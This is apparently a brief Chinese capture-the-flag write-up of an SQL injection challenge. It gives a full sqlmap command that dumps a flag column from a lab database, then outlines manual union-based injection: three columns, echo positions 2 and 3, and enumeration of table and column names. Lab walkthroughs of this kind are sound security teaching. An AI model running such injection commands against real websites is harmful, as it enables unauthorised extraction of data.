一.SQLMap
![在这里插入图片描述](https://img-blog.csdnimg.cn/2e18372d86f740ba91ce8e5ba09b1f3b.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAKuWwj-eRtg==,size_20,color_FFFFFF,t_70,g_se,x_16
4个库
2个表
一个字段
python sqlmap.py -u http://eci-2ze9bvacpamcsyr1n4pr.cloudeci1.ichunqiu.com/index.php?id=1 -D note -T fl4g -C fllllag --dump
二:手注
3个字段,联合注入,回显位在2和3
查看表名(2个)
查看fl4g表的字段名(通过后续测试可知flag在fl4g表里)